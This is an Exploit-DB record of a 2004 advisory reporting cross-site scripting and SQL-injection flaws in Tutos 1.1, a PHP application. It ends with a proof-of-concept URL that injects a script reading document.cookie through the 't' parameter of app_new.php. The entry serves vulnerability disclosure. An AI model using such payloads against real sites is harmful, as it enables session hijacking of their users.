TUTOS - 'app_new.php?t' Cross-Site Scripting

EDB-ID:

24617




Platform:

PHP

Date:

2004-09-20


source: https://www.securityfocus.com/bid/11221/info
 
Tutos is reported prone to multiple remote input-validation vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting and SQL-injection attacks.
 
These issue reportedly affect Tutos 1.1.2004-04-14.

http://www.example.com/app_new.php?t=200408240<script>alert(document.cookie)</script>